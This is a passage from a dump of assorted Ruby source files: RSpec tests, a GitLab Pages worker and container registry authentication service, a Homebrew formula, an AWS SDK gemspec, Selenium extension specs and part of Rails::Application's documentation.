it "should have a #{param} parameter" do
expect(described_class.attrtype(param)).to eq(:param)
end
end
end
describe 'namevar validation' do
it 'has :name as its namevar' do
expect(described_class.key_attributes).to eq([:name])
end
end
end
context 'autorequires' do
# rubocop:disable RSpec/InstanceVariable
before do
firewalld_service = Puppet::Type.type(:service).new(name: 'firewalld')
@catalog = Puppet::Resource::Catalog.new
@catalog.add_resource(firewalld_service)
end
it 'autorequires the firewalld service' do
resource = described_class.new(name: 'test', service: 'test')
@catalog.add_resource(resource)
expect(resource.autorequire.map { |rp| rp.source.to_s }).to include('Service[firewalld]')
end
# rubocop:enable RSpec/InstanceVariable
end
end
| 29.512195 | 109 | 0.681818 |
7afc35eabe60d3008f0c0d49bc46f2198345eee5 | 155 | module AuthHelper
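  # Builds an Authorization header for request specs. Illustrative usage
  # (the path helper here is hypothetical):
  #
  #   get api_v1_profile_path, headers: auth_headers(user)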
def auth_headers(user)
token = JsonWebToken.encode({user_id: user.id})
{'Authorization': "Bearer #{token[:token]}"}
end
end | 19.375 | 51 | 0.683871 |
875f17282f9804c6c662556dc1b3873c98ef4135 | 830 | # frozen_string_literal: true
class PagesWorker # rubocop:disable Scalability/IdempotentWorker
include ApplicationWorker
sidekiq_options retry: 3
feature_category :pages
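  # `action` is the name of one of the public methods below (:deploy or
  # :remove); any remaining arguments are forwarded to it.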
def perform(action, *arg)
send(action, *arg) # rubocop:disable GitlabSecurity/PublicSend
end
# rubocop: disable CodeReuse/ActiveRecord
def deploy(build_id)
build = Ci::Build.find_by(id: build_id)
result = Projects::UpdatePagesService.new(build.project, build).execute
if result[:status] == :success
result = Projects::UpdatePagesConfigurationService.new(build.project).execute
end
result
end
# rubocop: enable CodeReuse/ActiveRecord
def remove(namespace_path, project_path)
full_path = File.join(Settings.pages.path, namespace_path, project_path)
FileUtils.rm_r(full_path, force: true)
end
end
| 27.666667 | 83 | 0.755422 |
e27c68bf1197c098266f3d7ee5a6846d3106e2ea | 4,243 | require 'spec_helper'
describe ProjectRequestPresenter do
let(:project_request_presenter) { FactoryGirl.build(:project_request_presenter) }
describe "#project_request" do
let(:project_request) { project_request_presenter.project_request }
it "should instantiate a project request based on the params" do
project_request.new_record?.should be_true
project_request.requestor_organisation_uri.should == project_request_presenter.requestor_organisation_uri
project_request.project_uri.should == project_request_presenter.project_uri
end
end
describe "#save" do
it "should create a request with the right details" do
project_request_presenter.save
project_request_presenter.project_request.should be_persisted
project_request_presenter.project_request.requestor_organisation_uri.should == project_request_presenter.requestor_organisation_uri
project_request_presenter.project_request.project_uri.should == project_request_presenter.project_uri
end
end
context "when there's an existing pending request" do
let!(:project_request) { project_request_presenter.project_request.save! }
it "should be invalid" do
project_request_presenter.should_not be_valid
end
it "should have an error about not having existing requests" do
project_request_presenter.valid?
project_request_presenter.errors[:project_uri].should include("Your organisation has already requsted membership to this project")
end
end
context "when organisation is already a member of the project" do
before do
pm = ProjectMembership.new
pm.nature = Concepts::ProjectMembershipNature.all.first.uri
pm.project = project_request_presenter.project_uri
pm.organisation = project_request_presenter.requestor_organisation_uri
pm.save!
end
it "should not be valid" do
project_request_presenter.should_not be_valid
end
it "should have an error message about the org already being a member" do
project_request_presenter.valid?
project_request_presenter.errors[:project_uri].should include("This organisation is already a member of this project")
end
end
# let(:project_request_presenter) { FactoryGirl.build(:project_request_presenter) }
# let(:project) { Project.find(project_request_presenter.project.uri.to_s) }
# it "must have a valid factory" do
# project_request_presenter.should be_valid
# end
# it "must have not be for an organisation already a member of the project" do
# FactoryGirl.create(:project_membership, organisation: project_request_presenter.organisation.uri.to_s, project: project_request_presenter.project.uri.to_s)
# project_request_presenter.should_not be_valid
# end
# describe '.save' do
# context "without user details" do
# before do
# project_request_presenter.save
# end
# it "must create a project request with the correct details" do
# project_request_presenter.project_request.should be_persisted
# project_request_presenter.project_request.requestable.should == project_request_presenter.project
# project_request_presenter.project_request.requestor.should == project_request_presenter.organisation
# project_request_presenter.project_request.project_membership_nature_uri.should == project_request_presenter.nature_uri
# end
# end
# context "with user details" do
# before do
# end
# it "must create a user request with the correct details if they are provided" do
# organisation = FactoryGirl.create(:organisation)
# project_request_presenter.user_first_name = "Foo"
# project_request_presenter.user_email = "[email protected]"
# project_request_presenter.user_organisation_uri = organisation.uri.to_s
# project_request_presenter.save
# project_request_presenter.user_request.should be_persisted
# project_request_presenter.user_request.user_first_name.should == "Foo"
# project_request_presenter.user_request.user_email.should == "[email protected]"
# project_request_presenter.user_request.requestable.should == organisation
# end
# end
# end
end | 36.895652 | 161 | 0.757483 |
5dc753443be8c050693ded0d011cd1674b5d134b | 156 | class AddDecimalPlaceToExpenses < ActiveRecord::Migration[4.2]
def change
change_column :expenses, :value, :decimal, precision: 7, scale: 2
end
end
| 26 | 69 | 0.75 |
1d404915617e1bbf9723f078f35b4903f37f0ac6 | 1,914 | # frozen_string_literal: true
require 'spec_helper'
describe Gitlab::ContentSecurityPolicy::ConfigLoader do
let(:policy) { ActionDispatch::ContentSecurityPolicy.new }
let(:csp_config) do
{
enabled: true,
report_only: false,
directives: {
base_uri: 'http://example.com',
child_src: "'self' https://child.example.com",
default_src: "'self' https://other.example.com",
        script_src: "'self' https://script.example.com ",
worker_src: "data: https://worker.example.com",
report_uri: "http://example.com"
}
}
end
context '.default_settings_hash' do
it 'returns empty defaults' do
settings = described_class.default_settings_hash
expect(settings['enabled']).to be_falsey
expect(settings['report_only']).to be_falsey
described_class::DIRECTIVES.each do |directive|
expect(settings['directives'].has_key?(directive)).to be_truthy
expect(settings['directives'][directive]).to be_nil
end
end
end
context '#load' do
subject { described_class.new(csp_config[:directives]) }
def expected_config(directive)
csp_config[:directives][directive].split(' ').map(&:strip)
end
it 'sets the policy properly' do
subject.load(policy)
expect(policy.directives['base-uri']).to eq([csp_config[:directives][:base_uri]])
expect(policy.directives['default-src']).to eq(expected_config(:default_src))
expect(policy.directives['child-src']).to eq(expected_config(:child_src))
expect(policy.directives['worker-src']).to eq(expected_config(:worker_src))
expect(policy.directives['report-uri']).to eq(expected_config(:report_uri))
end
it 'ignores malformed policy statements' do
csp_config[:directives][:base_uri] = 123
subject.load(policy)
expect(policy.directives['base-uri']).to be_nil
end
end
end
| 30.870968 | 87 | 0.675026 |
edc621da4d34e64dda3a7d45e3d5fd8e2334defd | 3,175 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe Api::V1::RolesController, type: :request do
let!(:super_admin) { create(:user, :super_admin) }
let!(:organization) { create(:organization) }
let!(:with_read_permission) { organization.user }
let!(:cant_modify) do
[
create(:user, :admin),
create(:user, :waiter),
create(:user, :kitchen),
create(:user, :cash_register),
create(:user, :customer)
]
end
let!(:roles) { create_list(:role, 10) }
describe '#GET /api/roles' do
it 'requests all roles' do
get api_v1_roles_path, headers: auth_header(super_admin)
expect(response).to have_http_status(:ok)
end
it 'admin can read all roles' do
get api_v1_roles_path, headers: auth_header(with_read_permission)
expect(response).to have_http_status(:ok)
end
end
describe '#GET /api/roles/:id' do
it 'requests role by id' do
get api_v1_role_path(roles.sample.id), headers: auth_header(super_admin)
expect(response).to have_http_status(:ok)
end
it 'admin can read role by id' do
get api_v1_roles_path, headers: auth_header(with_read_permission)
expect(response).to have_http_status(:ok)
end
end
describe '#POST /api/roles' do
it 'creates a role' do
attributes = attributes_for(:role)
post api_v1_roles_path, params: attributes.to_json, headers: auth_header(super_admin)
expect(response).to have_http_status(:created)
end
it 'throws error with invalid params' do
post api_v1_roles_path, headers: auth_header(super_admin)
expect(response).to have_http_status(:unprocessable_entity)
end
it 'with invalid permission, should return forbidden status' do
attributes = attributes_for(:role)
post api_v1_roles_path, params: attributes.to_json, headers: auth_header(cant_modify.sample)
expect(response).to have_http_status(:forbidden)
end
end
describe '#PUT /api/roles/:id' do
let!(:role) { roles.sample }
it 'updates a role' do
      role.name = 'edited'
put api_v1_role_path(role.id), params: role.to_json, headers: auth_header(super_admin)
expect(response).to have_http_status(:ok)
end
it 'throws error with invalid params' do
role.name = ''
put api_v1_role_path(role.id), params: role.to_json, headers: auth_header(super_admin)
expect(response).to have_http_status(:unprocessable_entity)
end
it 'with invalid permission, should return forbidden status' do
      role.name = 'edited'
put api_v1_role_path(role.id), params: role.to_json, headers: auth_header(cant_modify.sample)
expect(response).to have_http_status(:forbidden)
end
end
describe '#DELETE /api/roles/:id' do
it 'deletes role' do
delete api_v1_role_path(roles.sample.id), headers: auth_header(super_admin)
expect(response).to have_http_status(:no_content)
end
it 'with invalid permission, should return forbidden status' do
delete api_v1_role_path(roles.sample.id), headers: auth_header(cant_modify.sample)
expect(response).to have_http_status(:forbidden)
end
end
end
| 32.731959 | 99 | 0.700787 |
edb765ee1a6ecb64eb483a8bdd73d1bb933adac6 | 481 | require 'formula'
class Dex2jar < Formula
homepage 'https://code.google.com/p/dex2jar/'
url 'https://dex2jar.googlecode.com/files/dex2jar-0.0.9.15.zip'
sha1 'cc9366836d576ce22a18de8f214368636db9fcba'
def install
# Remove Windows scripts
rm_rf Dir['*.bat']
# Install files
prefix.install_metafiles
libexec.install Dir['*']
Dir.glob("#{libexec}/*.sh") do |script|
bin.install_symlink script => File.basename(script, '.sh')
end
end
end
| 22.904762 | 65 | 0.683992 |
1db32ed4e01dcdd85a7e6b40bf8a128cc3214f8b | 1,343 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-apigatewaymanagementapi'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - AmazonApiGatewayManagementApi'
spec.description = 'Official AWS Ruby gem for AmazonApiGatewayManagementApi. This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['LICENSE.txt', 'CHANGELOG.md', 'VERSION', 'lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-apigatewaymanagementapi',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-apigatewaymanagementapi/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.125.0')
spec.add_dependency('aws-sigv4', '~> 1.1')
spec.required_ruby_version = '>= 2.3'
end
| 40.69697 | 127 | 0.685778 |
2181af2e7eff49f4ff99db5fbebed1b44d77d2c6 | 1,058 | # frozen_string_literal: true
require 'aws_backend'
class AWSMQConfiguration < AwsResourceBase
name 'aws_mq_configuration'
desc 'Describes a Amazon MQ configuration.'
example "
describe aws_mq_configuration(configuration_id: 'test1') do
it { should exist }
end
"
def initialize(opts = {})
opts = { configuration_id: opts } if opts.is_a?(String)
super(opts)
validate_parameters(required: [:configuration_id])
raise ArgumentError, "#{@__resource_name__}: configuration_id must be provided" unless opts[:configuration_id] && !opts[:configuration_id].empty?
@display_name = opts[:configuration_id]
resp = @aws.mq_client.describe_configuration({ configuration_id: opts[:configuration_id] })
@configurations = resp.to_h
create_resource_methods(@configurations)
end
def configuration_id
return nil unless exists?
@configurations[:configuration_id]
end
def exists?
    !@configurations.nil? && !@configurations.empty?
end
def to_s
"Configuration ID: #{@display_name}"
end
end
| 26.45 | 149 | 0.725898 |
4a699fe32130a046f51c672fa8f0608c6a976963 | 7,056 | # frozen_string_literal: true
module Auth
class ContainerRegistryAuthenticationService < BaseService
AUDIENCE = 'container_registry'
REGISTRY_LOGIN_ABILITIES = [
:read_container_image,
:create_container_image,
:destroy_container_image,
:update_container_image,
:admin_container_image,
:build_read_container_image,
:build_create_container_image,
:build_destroy_container_image
].freeze
def execute(authentication_abilities:)
@authentication_abilities = authentication_abilities
return error('UNAVAILABLE', status: 404, message: 'registry not enabled') unless registry.enabled
return error('DENIED', status: 403, message: 'access forbidden') unless has_registry_ability?
unless scopes.any? || current_user || project
return error('DENIED', status: 403, message: 'access forbidden')
end
{ token: authorized_token(*scopes).encoded }
end
def self.full_access_token(*names)
access_token(%w(*), names)
end
def self.pull_access_token(*names)
access_token(['pull'], names)
end
def self.access_token(actions, names)
names = names.flatten
registry = Gitlab.config.registry
token = JSONWebToken::RSAToken.new(registry.key)
token.issuer = registry.issuer
token.audience = AUDIENCE
token.expire_time = token_expire_at
token[:access] = names.map do |name|
{ type: 'repository', name: name, actions: actions }
end
token.encoded
end
def self.token_expire_at
Time.now + Gitlab::CurrentSettings.container_registry_token_expire_delay.minutes
end
private
def authorized_token(*accesses)
JSONWebToken::RSAToken.new(registry.key).tap do |token|
token.issuer = registry.issuer
token.audience = params[:service]
token.subject = current_user.try(:username)
token.expire_time = self.class.token_expire_at
token[:access] = accesses.compact
end
end
def scopes
return [] unless params[:scopes]
@scopes ||= params[:scopes].map do |scope|
process_scope(scope)
end.compact
end
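    # Scope strings follow the Docker Distribution token format
    # "type:name:actions", e.g. "repository:group/project:pull,push" or
    # "registry:catalog:*".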
def process_scope(scope)
type, name, actions = scope.split(':', 3)
actions = actions.split(',')
case type
when 'registry'
process_registry_access(type, name, actions)
when 'repository'
path = ContainerRegistry::Path.new(name)
process_repository_access(type, path, actions)
end
end
def process_registry_access(type, name, actions)
return unless current_user&.admin?
return unless name == 'catalog'
return unless actions == ['*']
{ type: type, name: name, actions: ['*'] }
end
def process_repository_access(type, path, actions)
return unless path.valid?
requested_project = path.repository_project
return unless requested_project
actions = actions.select do |action|
can_access?(requested_project, action)
end
return unless actions.present?
# At this point user/build is already authenticated.
#
ensure_container_repository!(path, actions)
{ type: type, name: path.to_s, actions: actions }
end
##
# Because we do not have two way communication with registry yet,
# we create a container repository image resource when push to the
# registry is successfully authorized.
#
def ensure_container_repository!(path, actions)
return if path.has_repository?
return unless actions.include?('push')
ContainerRepository.create_from_path!(path)
end
def can_access?(requested_project, requested_action)
return false unless requested_project.container_registry_enabled?
case requested_action
when 'pull'
build_can_pull?(requested_project) || user_can_pull?(requested_project) || deploy_token_can_pull?(requested_project)
when 'push'
build_can_push?(requested_project) || user_can_push?(requested_project) || deploy_token_can_push?(requested_project)
when 'delete'
build_can_delete?(requested_project) || user_can_admin?(requested_project)
when '*'
user_can_admin?(requested_project)
else
false
end
end
def build_can_delete?(requested_project)
# Build can delete only from the project from which it originates
has_authentication_ability?(:build_destroy_container_image) &&
requested_project == project
end
def registry
Gitlab.config.registry
end
def can_user?(ability, project)
user = current_user.is_a?(User) ? current_user : nil
can?(user, ability, project)
end
def build_can_pull?(requested_project)
# Build can:
# 1. pull from its own project (for ex. a build)
# 2. read images from dependent projects if creator of build is a team member
has_authentication_ability?(:build_read_container_image) &&
(requested_project == project || can_user?(:build_read_container_image, requested_project))
end
def user_can_admin?(requested_project)
has_authentication_ability?(:admin_container_image) &&
can_user?(:admin_container_image, requested_project)
end
def user_can_pull?(requested_project)
has_authentication_ability?(:read_container_image) &&
can_user?(:read_container_image, requested_project)
end
def deploy_token_can_pull?(requested_project)
has_authentication_ability?(:read_container_image) &&
current_user.is_a?(DeployToken) &&
current_user.has_access_to?(requested_project) &&
current_user.read_registry?
end
def deploy_token_can_push?(requested_project)
has_authentication_ability?(:create_container_image) &&
current_user.is_a?(DeployToken) &&
current_user.has_access_to?(requested_project) &&
current_user.write_registry?
end
##
# We still support legacy pipeline triggers which do not have associated
# actor. New permissions model and new triggers are always associated with
# an actor. So this should be improved once
# https://gitlab.com/gitlab-org/gitlab-foss/issues/37452 is resolved.
#
def build_can_push?(requested_project)
# Build can push only to the project from which it originates
has_authentication_ability?(:build_create_container_image) &&
requested_project == project
end
def user_can_push?(requested_project)
has_authentication_ability?(:create_container_image) &&
can_user?(:create_container_image, requested_project)
end
def error(code, status:, message: '')
{ errors: [{ code: code, message: message }], http_status: status }
end
def has_authentication_ability?(capability)
@authentication_abilities.to_a.include?(capability)
end
def has_registry_ability?
@authentication_abilities.any? do |ability|
REGISTRY_LOGIN_ABILITIES.include?(ability)
end
end
end
end
| 31.0837 | 124 | 0.692035 |
acc6231dd291d6f7baf91699191c82c72b4b5362 | 213 | class <%= redemption_class_name %> < ActiveRecord::Base
belongs_to :<%= singular_name %>, :counter_cache => 'redemptions_count'
belongs_to :user
validates_presence_of :user_id, :<%= singular_name %>_id
end
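# Note (assumption, not part of the generated template): the counter cache
# above expects the parent table to have an integer `redemptions_count`
# column, added in a separate migration.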
| 30.428571 | 73 | 0.732394 |
6aa54b0be1d4ff9b69fa8974648bd6636d4d481c | 2,929 | RSpec.describe Harvest::Api::Resources::TimeEntries do
subject do
described_class.new(access_token: ENV['HARVEST_ACCESS_TOKEN'],
account_id: ENV['HARVEST_ACCOUNT_ID'])
end
let(:time_entry_attributes) do
%w(id spent_date hours notes is_locked locked_reason is_closed is_billed
timer_started_at started_time ended_time is_running billable budgeted
billable_rate cost_rate created_at updated_at user client project task
user_assignment task_assignment invoice external_reference)
end
describe "#all" do
it "returns an array" do
VCR.use_cassette("time_entries/all") do
time_entries = subject.all
expect(time_entries).to be_kind_of(Array)
end
end
it 'returns hashes with the correct attributes' do
VCR.use_cassette("time_entries/all") do
expect(subject.all.first.keys).to match_array(time_entry_attributes)
end
end
context 'when a page is passed as parameter' do
it 'adds the given page to request query' do
options = { options: { query: { page: 1, per_page: 100 } } }
expect(subject).to receive(:get_collection).
with('/time_entries', options).and_call_original
VCR.use_cassette("time_entries/all_page_1") do
subject.all(page: 1)
end
end
context 'and there is no time entries in the given page' do
it 'returns an empty array' do
VCR.use_cassette("time_entries/all_page_2_empty") do
expect(subject.all(page: 2)).to be_empty
end
end
end
end
end
describe "#find" do
let(:id) { subject.all.first['id'] }
it "returns a Hash" do
VCR.use_cassette('time_entries/found') do
time_entry = subject.find(id)
expect(time_entry).to be_kind_of(Hash)
end
end
it "returns the correct attributes in the Hash" do
VCR.use_cassette('time_entries/found') do
expect(subject.find(id).keys).to match_array(time_entry_attributes)
end
end
context "when no time entry is found with the given id" do
it "raises a not found error" do
VCR.use_cassette('time_entries/not_found') do
expect {
subject.find('0')
}.to raise_error(Harvest::Api::Errors::NotFoundError)
end
end
end
end
describe "#in_period" do
let(:to) { Date.parse('2018-06-26') }
let(:from) { to - 10 }
it "returns the same object as response" do
expect(subject.in_period(from, to)).to eq(subject)
end
it "adds the period to the request query before performing it" do
options = { query: { from: from, to: to, page: 1, per_page: 100 } }
expect(subject).to receive(:get_collection).
with('/time_entries', options: options).and_call_original
VCR.use_cassette('time_entries/in_period') do
subject.in_period(from, to).all
end
end
end
end
| 29.887755 | 76 | 0.656197 |
219865cbb54f7f0142e33a8bb7c0ece28d7314a8 | 326 | FactoryGirl.define do
factory :application_token do
sequence :application do |i|
"application #{i}"
end
# the plain-text token is the value of the application attribute
token_salt { BCrypt::Engine.generate_salt }
token_hash { BCrypt::Engine.hash_secret(application, token_salt) }
association :user, factory: :user
end
end
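# Verification sketch (illustrative): the stored hash can be checked
# against the plain token with the same BCrypt call used above:
#
#   token = create(:application_token)
#   BCrypt::Engine.hash_secret(token.application, token.token_salt) == token.token_hash
#   # => true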
| 23.285714 | 70 | 0.702454 |
18ebb13414eaf6c664dad60013b9e71ce624c625 | 934 | # frozen_string_literal: true
lib = File.expand_path('lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'cross_table/version'
Gem::Specification.new do |spec|
spec.name = 'cross_table'
spec.version = CrossTable::VERSION
spec.authors = ['masa.kunikata']
spec.email = ['[email protected]']
spec.summary = 'cross tabulation "pivot table" utility'
spec.homepage = 'https://github.com/masa-kunikata/cross_table'
spec.license = 'MIT'
spec.files = Dir.chdir(__dir__) do
`git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
end
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_development_dependency 'bundler', '~> 2.0'
spec.add_development_dependency 'rake', '~> 13.0'
spec.required_ruby_version = '>= 2.5'
end
| 32.206897 | 74 | 0.648822 |
014d9750ec33ba72a54d0fc6940976e0f609876b | 7,934 | # encoding: utf-8
#
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require File.expand_path("../spec_helper", __FILE__)
describe Selenium::Client::Extensions do
class ExtensionsClient
include Selenium::Client::Extensions
end
let(:client) { ExtensionsClient.new }
describe "#wait_for_text" do
it "waits for the innerHTML content of an element when a locator is provided" do
client.should_receive(:wait_for_condition).with(/findElement\('a_locator'\)/, anything)
client.wait_for_text "some text", :element => "a_locator"
end
it "waits for the page content when no locator is provided" do
client.should_receive(:wait_for_condition).with(%r{document.body.innerHTML.match\(/some text/\)}m, anything)
client.wait_for_text "some text"
end
it "waits for the page content regexp when no locator is provided" do
client.should_receive(:wait_for_condition).with(%r{document.body.innerHTML.match\(/some text/\)}m, anything)
client.wait_for_text(/some text/)
end
it "uses default timeout when none is provided" do
client.should_receive(:wait_for_condition).with(anything, nil)
client.wait_for_text "some text"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :explicit_timeout)
client.wait_for_text "some text", :timeout_in_seconds => :explicit_timeout
end
end
describe "#wait_for_no_text" do
it "waits for the innerHTML content of an element when a locator is provided" do
client.should_receive(:wait_for_condition).with(/findElement\('a_locator'\)/, anything)
client.wait_for_no_text "some text", :element => "a_locator"
end
it "waits for the page content for regexp when no locator is provided" do
client.should_receive(:wait_for_condition).with(%r{document.body.innerHTML.match\(/some text/\)}m, anything)
client.wait_for_no_text(/some text/)
end
it "waits for the page content when no locator is provided" do
client.should_receive(:wait_for_condition).with(%r{document.body.innerHTML.match\(/some text/\)}m, anything)
client.wait_for_no_text "some text"
end
it "uses default timeout when none is provided" do
client.should_receive(:wait_for_condition).with(anything, nil)
client.wait_for_no_text "some text"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :explicit_timeout)
client.wait_for_no_text "some text", :timeout_in_seconds => :explicit_timeout
end
end
describe "#wait_for_ajax" do
it "uses Ajax.activeRequestCount when default js framework is prototype" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with("selenium.browserbot.getCurrentWindow().Ajax.activeRequestCount == 0;", anything)
client.wait_for_ajax
end
it "uses jQuery.active when default js framework is jQuery" do
client.stub(:default_javascript_framework).and_return(:jquery)
client.should_receive(:wait_for_condition).with("selenium.browserbot.getCurrentWindow().jQuery.active == 0;", anything)
client.wait_for_ajax
end
it "can override default js framework" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with("selenium.browserbot.getCurrentWindow().jQuery.active == 0;", anything)
client.wait_for_ajax :javascript_framework => :jquery
end
it "uses default timeout when none is provided" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with(anything, nil)
client.wait_for_ajax
end
it "uses explicit timeout when provided" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with(anything, :explicit_timeout)
client.wait_for_ajax :timeout_in_seconds => :explicit_timeout
end
end
describe "#wait_for_effect" do
it "uses Effect.Queue.size() when default js framework is prototype" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with("selenium.browserbot.getCurrentWindow().Effect.Queue.size() == 0;", anything)
client.wait_for_effects
end
it "uses default timeout when none is provided" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with(anything, nil)
client.wait_for_effects
end
it "uses explicit timeout when provided" do
client.stub(:default_javascript_framework).and_return(:prototype)
client.should_receive(:wait_for_condition).with(anything, :explicit_timeout)
client.wait_for_effects :timeout_in_seconds => :explicit_timeout
end
end
describe "#wait_for_field_value" do
it "uses provided locator" do
client.should_receive(:wait_for_condition).with(/findElement\('a_locator'\)/, anything)
client.wait_for_field_value "a_locator", "a value"
end
it "uses provided field value" do
client.should_receive(:wait_for_condition).with(/element.value == 'a value'/, anything)
client.wait_for_field_value "a_locator", "a value"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :the_timeout)
client.wait_for_field_value "a_locator", "a value", :timeout_in_seconds => :the_timeout
end
end
describe "#wait_for_no_field_value" do
it "uses provided locator" do
client.should_receive(:wait_for_condition).with(/findElement\('a_locator'\)/, anything)
client.wait_for_no_field_value "a_locator", "a value"
end
it "uses provided field value" do
client.should_receive(:wait_for_condition).with(/element.value != 'a value'/, anything)
client.wait_for_no_field_value "a_locator", "a value"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :the_timeout)
client.wait_for_no_field_value "a_locator", "a value", :timeout_in_seconds => :the_timeout
end
end
describe "#wait_for_visible" do
it "uses provided locator" do
client.should_receive(:wait_for_condition).with("selenium.isVisible('a_locator')", anything)
client.wait_for_visible "a_locator"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :the_timeout)
client.wait_for_visible "a_locator", :timeout_in_seconds => :the_timeout
end
end
describe "#wait_for_not_visible" do
it "uses provided locator" do
client.should_receive(:wait_for_condition).with("!selenium.isVisible('a_locator')", anything)
client.wait_for_not_visible "a_locator"
end
it "uses explicit timeout when provided" do
client.should_receive(:wait_for_condition).with(anything, :the_timeout)
client.wait_for_not_visible "a_locator", :timeout_in_seconds => :the_timeout
end
end
end
| 40.896907 | 135 | 0.738593 |
08e3f9500dcfdcab9e9fb767fe205338f24dd6e1 | 79 | class TWEnv::Error < RuntimeError
ArchiveNotFoundError = Class.new(self)
end
| 19.75 | 40 | 0.78481 |
28dd3f97c959f14e6734484cdb4e8e4abff45a70 | 1,052 | Puppet::Type.newtype(:neutron_vpnaas_service_config) do
ensurable
newparam(:name, :namevar => true) do
desc 'Section/setting name to manage from neutron_vpnaas.conf'
newvalues(/\S+\/\S+/)
end
newproperty(:value, :array_matching => :all) do
desc 'The value of the setting to be defined.'
def insync?(is)
return true if @should.empty?
return false unless is.is_a? Array
return false unless is.length == @should.length
# we don't care about the order of items in the array, hence
# it is necessary to override insync?
return (
is & @should == is or
is & @should.map(&:to_s) == is
)
end
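# For example, with @should = ['a', 'b'] both orderings are in sync,
# while a shorter value is not:
#
#   insync?(['b', 'a']) # => true (same items, different order)
#   insync?(['a'])      # => false (length differs)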
munge do |value|
value = value.to_s.strip
value.capitalize! if value =~ /^(true|false)$/i
value
end
end
newparam(:ensure_absent_val) do
desc 'A value that is specified as the value property will behave as if ensure => absent was specified'
defaultto('<SERVICE DEFAULT>')
end
autorequire(:anchor) do
['neutron::install::end']
end
end
| 25.658537 | 107 | 0.642586 |
0333dd2f3c0ab707753df0a52a7e4ecc8be1a05c | 236 | require 'habitat'
require 'jungle_organism_factory'
require 'pond_organism_factory'
jungle = Habitat.new(1, 4, JungleOrganismFactory.new)
jungle.simulate_one_day
pond = Habitat.new(3, 2, PondOrganismFactory.new)
pond.simulate_one_day
| 23.6 | 53 | 0.822034 |
e2d6123ac990df5e23eca894eb3611f81c22a861 | 164 | require 'rails_helper'
module Cmor::Galleries
RSpec.describe PictureDetail, type: :model do
pending "add some examples to (or delete) #{__FILE__}"
end
end
| 20.5 | 58 | 0.737805 |
38dadb38d80dde47746bc2220514c385995eb841 | 22,633 | # frozen_string_literal: true
require "yaml"
require "active_support/core_ext/hash/keys"
require "active_support/core_ext/object/blank"
require "active_support/key_generator"
require "active_support/message_verifier"
require "active_support/encrypted_configuration"
require "active_support/deprecation"
require "rails/engine"
require "rails/secrets"
module Rails
# An Engine with the responsibility of coordinating the whole boot process.
#
# == Initialization
#
# Rails::Application is responsible for executing all railties and engines
# initializers. It also executes some bootstrap initializers (check
# Rails::Application::Bootstrap) and finishing initializers, after all the others
# are executed (check Rails::Application::Finisher).
#
# == Configuration
#
# Besides providing the same configuration as Rails::Engine and Rails::Railtie,
# the application object has several specific configurations, for example
# "cache_classes", "consider_all_requests_local", "filter_parameters",
# "logger" and so forth.
#
# Check Rails::Application::Configuration to see them all.
#
# == Routes
#
# The application object is also responsible for holding the routes and reloading routes
# whenever the files change in development.
#
# == Middlewares
#
# The Application is also responsible for building the middleware stack.
#
# == Booting process
#
# The application is also responsible for setting up and executing the booting
# process. From the moment you require "config/application.rb" in your app,
# the booting process goes like this:
#
#   1) require "config/boot.rb" to set up load paths
# 2) require railties and engines
# 3) Define Rails.application as "class MyApp::Application < Rails::Application"
# 4) Run config.before_configuration callbacks
# 5) Load config/environments/ENV.rb
# 6) Run config.before_initialize callbacks
# 7) Run Railtie#initializer defined by railties, engines and application.
# One by one, each engine sets up its load paths, routes and runs its config/initializers/* files.
# 8) Custom Railtie#initializers added by railties, engines and applications are executed
# 9) Build the middleware stack and run to_prepare callbacks
# 10) Run config.before_eager_load and eager_load! if eager_load is true
# 11) Run config.after_initialize callbacks
#
# == Multiple Applications
#
# If you decide to define multiple applications, then the first application
# that is initialized will be set to +Rails.application+, unless you override
# it with a different application.
#
# To create a new application, you can instantiate a new instance of a class
# that has already been created:
#
# class Application < Rails::Application
# end
#
# first_application = Application.new
# second_application = Application.new(config: first_application.config)
#
# In the above example, the configuration from the first application was used
# to initialize the second application. You can also use the +initialize_copy+
